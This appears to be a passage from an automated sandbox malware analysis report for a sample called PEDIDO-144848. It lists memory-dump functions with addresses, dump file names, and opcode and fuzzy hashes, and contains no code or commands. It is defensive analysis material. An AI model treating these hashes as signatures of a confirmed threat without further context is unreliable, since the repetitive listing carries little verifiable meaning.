                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                        • Instruction ID: 391c17e848b60406d04d0b834a2bc72101df6acf61c8d446a2c3fbabbf064c66
                                                        • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                        • Instruction Fuzzy Hash: 77D012371D094CBBCB119F65DC01F957BA9E795B60F044020B508875A0DA3AE950D584
                                                        Function 36C3C620 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                        • Instruction ID: bd343785fc7218121bcc0d9375e7f1611abfaf15ee06d478444040b8989286a8
                                                        • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                        • Instruction Fuzzy Hash: DEC08C33290A48AFC722DF98CD01F027BA9EB98B00F000021F3088B670D631FC20EA88
                                                        Function 36C101C0 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                        • Instruction ID: 1c4327c5abfffdd45c8019431b047c466713e9af9df99f644c8f611aa610db36
                                                        • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                        • Instruction Fuzzy Hash: 70D0C939312D80DFD606CB0AC894B0533A4BB44B84FD144A4E801CB722D62CD940CA04
                                                        Function 36C20230 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                        • Instruction ID: f72999c2934ed3263b46b1f3d2b11ee6fa202500b2f83c97e2c82c16e03c6267
                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                        • Instruction Fuzzy Hash: 22D0123620064CEFCB05DF40C854D5A7B2AFFC8710F10801AFD19077108A31ED62DA50
                                                        Function 36C2332D Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                        • Instruction ID: b811d8eb9d5843de9ac8289018ea0b0a0d8d84fd5ed37d6e0cafd2a1241ebfa2
                                                        • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                        • Instruction Fuzzy Hash: 13C08CB8551AC06EEF1A4B00CD10B283754BB01B49F90019CAF089E4A1C7AADA02C208
                                                        Function 36C00670 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                        • Instruction ID: 6de309374c50a62d77c121d4dec005f11e5858637da2403af0f74a1f0f007461
                                                        • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                        • Instruction Fuzzy Hash: C6C04C39751A508FDF05CB2AC694F0977F4F748744F1504D0E905CB721D624EC00DA15
                                                        Function 36C44570 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5711bc18d24c54c88239250d0cc350ea7b352d0500d9cd427a13c1a17191cca
                                                        • Instruction ID: bfe0d55a8ca9925478a52cc74958c896806dae4b6a719ad226dbea941a8b4a79
                                                        • Opcode Fuzzy Hash: e5711bc18d24c54c88239250d0cc350ea7b352d0500d9cd427a13c1a17191cca
                                                        • Instruction Fuzzy Hash: B990026160211452454071594D044066005A7E1305392C51BA2544524DC6288859A27E
                                                        Function 36C44260 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89a9e144cc096b169ec542cca49506f74e9e9a1d43d7470e877fc0143e22e9ec
                                                        • Instruction ID: 12761ddba78bb0033934cbf495cd37cec424d9dfa1907753bf3e3608505229af
                                                        • Opcode Fuzzy Hash: 89a9e144cc096b169ec542cca49506f74e9e9a1d43d7470e877fc0143e22e9ec
                                                        • Instruction Fuzzy Hash: 3790023160641422954071594D845464005A7E0305B52C417E2414518DCA24895A6376
                                                        Function 36C42EC0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 148bae444f785351a4a122011b9c4a9ea6988f3570c281a012072493f3255279
                                                        • Instruction ID: da4bb23ed413937ca32e95ec33ad36e93a649e9e36306ee7c118536738e81ba2
                                                        • Opcode Fuzzy Hash: 148bae444f785351a4a122011b9c4a9ea6988f3570c281a012072493f3255279
                                                        • Instruction Fuzzy Hash: 5890023120241812D50061594D08747000597D0306F52C417A7154519FC675C8957536
                                                        Function 36C42ED0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f30c5352b4b3501c989c0dd2dc045982fdea938ed9003aedc14e1ab8de0f516b
                                                        • Instruction ID: 8fd85a7d81825e74e74cbe79c97c78a8b3e71725565be2f7152ec673e1a8c9f4
                                                        • Opcode Fuzzy Hash: f30c5352b4b3501c989c0dd2dc045982fdea938ed9003aedc14e1ab8de0f516b
                                                        • Instruction Fuzzy Hash: 3C90022160201452454071698D449064005BBE1215752C527A2988514EC5698869667A
                                                        Function 36C42E80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f1e238d2b50104ad84e5aff48f3a5fc553ccc00138e26f1d60707b255e08c4f
                                                        • Instruction ID: c3b889ae4eb46316d6d60b1e3a5260808b720b216fb7c29bf031e3ae1e889c01
                                                        • Opcode Fuzzy Hash: 7f1e238d2b50104ad84e5aff48f3a5fc553ccc00138e26f1d60707b255e08c4f
                                                        • Instruction Fuzzy Hash: E190026121201452D50461594904706004597E1205F52C417A3144518DC5398C65613A
                                                        Function 36C42E50 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95c19566e6bb68374d6acd1e7397ed16343649f97572276497e747fb7e8c7f7e
                                                        • Instruction ID: c5fa3c239ebc962312502a513002f774733074fd19e98611a8c431a879104647
                                                        • Opcode Fuzzy Hash: 95c19566e6bb68374d6acd1e7397ed16343649f97572276497e747fb7e8c7f7e
                                                        • Instruction Fuzzy Hash: 1C90026134201852D50061594914B060005D7E1305F52C41BE3054518EC629CC56713B
                                                        Function 36C42E00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: feb026ed97acd2932eef09b1d1040effc3d84ecad76ce0379940fa8ce00e9d4f
                                                        • Instruction ID: d0ec91f34c6b0dea545b75b72a2bda193b743f13435acf28c5adaec9df6db216
                                                        • Opcode Fuzzy Hash: feb026ed97acd2932eef09b1d1040effc3d84ecad76ce0379940fa8ce00e9d4f
                                                        • Instruction Fuzzy Hash: 6290026120241813D54065594D04607000597D0306F52C417A3054519FCA398C55713A
                                                        Function 36C42FB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f43a6c418c8a2b86cd5c3f3daa78b000a37992c79ae0eac7aaf939edc6380ac
                                                        • Instruction ID: 89ed0b4dad28f11701c52cc42fb95251d20e793f56504ff07b7e68401c5f415f
                                                        • Opcode Fuzzy Hash: 3f43a6c418c8a2b86cd5c3f3daa78b000a37992c79ae0eac7aaf939edc6380ac
                                                        • Instruction Fuzzy Hash: 7990022124201C12D540715989147070006D7D0605F52C417A2014518EC626896976B6
                                                        Function 36C42F00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71940816c31a4c3d82867907e58cd4dc7f7f95a52f791c38acdf2a32511c8a74
                                                        • Instruction ID: 297fee6a6a32f85746f3bf6833e1d3f26dee5488836bdf45d0970ce98fc4211e
                                                        • Opcode Fuzzy Hash: 71940816c31a4c3d82867907e58cd4dc7f7f95a52f791c38acdf2a32511c8a74
                                                        • Instruction Fuzzy Hash: DC90022121281452D60065694D14B07000597D0307F52C51BA2144518DC92588656536
                                                        Function 36C42F30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ec2b4bf79461fee641744487dd3ac77376401f95d60731f25747ea9102a6f1c
                                                        • Instruction ID: 770fc473c2c814129ffe3fcd3b8b6a555f09721d441cebee09fcb2b492d80ff3
                                                        • Opcode Fuzzy Hash: 2ec2b4bf79461fee641744487dd3ac77376401f95d60731f25747ea9102a6f1c
                                                        • Instruction Fuzzy Hash: 0C90022120245852D54062594D04B0F410597E1206F92C41FA6146518DC92588596736
                                                        Function 36C42CD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39774f7c118cc33c8a6ec061993c22fdb199bb76101b9173f70aa1f5e29c4c89
                                                        • Instruction ID: ad9a36614b792f7dd5c17d47c0f340c06fc8e2c4b9e44f572e9086b75008ec96
                                                        • Opcode Fuzzy Hash: 39774f7c118cc33c8a6ec061993c22fdb199bb76101b9173f70aa1f5e29c4c89
                                                        • Instruction Fuzzy Hash: EB90023124201812D541715949046060009A7D0245F92C417A2414518FC6658A5ABA76
                                                        Function 36C42CF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7cd7b6571942c6e34eb70f773143aaaa3e2149071999d893e21210093792b7ff
                                                        • Instruction ID: 2455778419df2d886e677c832a0a67339cff48cd3f0f87f115105b6cae897da2
                                                        • Opcode Fuzzy Hash: 7cd7b6571942c6e34eb70f773143aaaa3e2149071999d893e21210093792b7ff
                                                        • Instruction Fuzzy Hash: 9E900221243055625945B15949045074006A7E0245792C417A3404914DC536985AE636
                                                        Function 36C43C90 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa1e093836c31b3004454b3bd02c0219b163730153c84a5424fc2e1b6ce335a1
                                                        • Instruction ID: cc6d6a10504f565299da58c8e0691bace626427b92d004cc3f66e640824e5f4f
                                                        • Opcode Fuzzy Hash: aa1e093836c31b3004454b3bd02c0219b163730153c84a5424fc2e1b6ce335a1
                                                        • Instruction Fuzzy Hash: 7890023520201812D91061595D04646004697D0305F52D817A241451CEC66488A5B136
                                                        Function 36C42C50 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11e33974395b5cb0eabb137b7cb52dbdda0635bd1008d8720f4bff391c081b5b
                                                        • Instruction ID: 9e18de97734a1258d84ce8289836e8281335dbdee2bc2587e6db50d89dfcebb3
                                                        • Opcode Fuzzy Hash: 11e33974395b5cb0eabb137b7cb52dbdda0635bd1008d8720f4bff391c081b5b
                                                        • Instruction Fuzzy Hash: A590022130201413D540715959186064005E7E1305F52D417E2404518DD925885A6237
                                                        Function 36C42C10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3113702ecced0758edd7bfd80d0dc6df16de7952fbedcacc1e7fafb5babde044
                                                        • Instruction ID: 4ca487ca948b0402f6ed8633b72ed59fc1f42423fafae5cf0c370d5d7c27e587
                                                        • Opcode Fuzzy Hash: 3113702ecced0758edd7bfd80d0dc6df16de7952fbedcacc1e7fafb5babde044
                                                        • Instruction Fuzzy Hash: 4C90023120201813D50061595A08707000597D0205F52D817A241451CED66688557136
                                                        Function 36C42C20 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d765cba0149b0bd6e768ca4bd03e009bfe62f41262ccab1a5db31c44eac94aa
                                                        • Instruction ID: c93b050f210e38e398c0782d6829099a9b76000e7bce7e2279f9af287635357b
                                                        • Opcode Fuzzy Hash: 1d765cba0149b0bd6e768ca4bd03e009bfe62f41262ccab1a5db31c44eac94aa
                                                        • Instruction Fuzzy Hash: A190022120605852D50065595908A06000597D0209F52D417A3054559EC6358855B136
                                                        Function 36C43C30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb63aa67d87e51ff41a35819e1fb9354f9ee388cc0a4d8c103aeb7371789a5d9
                                                        • Instruction ID: 9e57b8e77e12be480b5df0f272a81c054ceb10542aced8934ebd5a7d826b772b
                                                        • Opcode Fuzzy Hash: bb63aa67d87e51ff41a35819e1fb9354f9ee388cc0a4d8c103aeb7371789a5d9
                                                        • Instruction Fuzzy Hash: 3B90023120301552994062595D04A4E410597E1306B92D81BA2005518DC92488656236
                                                        Function 36C42C30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89bb2dd46f83166cd4b6ac66e7f2d3d95193b42ea7b59215bb1d958af9a9a7ab
                                                        • Instruction ID: 2d980fa4e3aaef1a76c844bf8c95f5d5e02943702bab32be396d55955579d9eb
                                                        • Opcode Fuzzy Hash: 89bb2dd46f83166cd4b6ac66e7f2d3d95193b42ea7b59215bb1d958af9a9a7ab
                                                        • Instruction Fuzzy Hash: C590022921301412D5807159590860A000597D1206F92D81BA200551CDC925886D6336
                                                        Function 36C42DC0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91c71d638344203804cf4e8f340b5acb709ce5068b7c9d2258131196b2464f87
                                                        • Instruction ID: d4f5027eed90201643f2398d63731d0f6fcb0e70450507ae5473be2a5e997ba0
                                                        • Opcode Fuzzy Hash: 91c71d638344203804cf4e8f340b5acb709ce5068b7c9d2258131196b2464f87
                                                        • Instruction Fuzzy Hash: A790027120201812D54071594904746000597D0305F52C417A7054518FC6698DD9767A
                                                        Function 36C42DA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 34af3d92342371c1c15a11aaa24df94fcbb9a74dd476b0266af48e6025593f89
                                                        • Instruction ID: c84b5cfe70e967c09d4121c592650ccf5ebf8173799510c8a9d090d878fee107
                                                        • Opcode Fuzzy Hash: 34af3d92342371c1c15a11aaa24df94fcbb9a74dd476b0266af48e6025593f89
                                                        • Instruction Fuzzy Hash: 7590022160201912D50171594904616000A97D0245F92C427A3014519FCA358996B136
                                                        Function 36C42D50 Relevance: .0, Instructions: 4COMMON
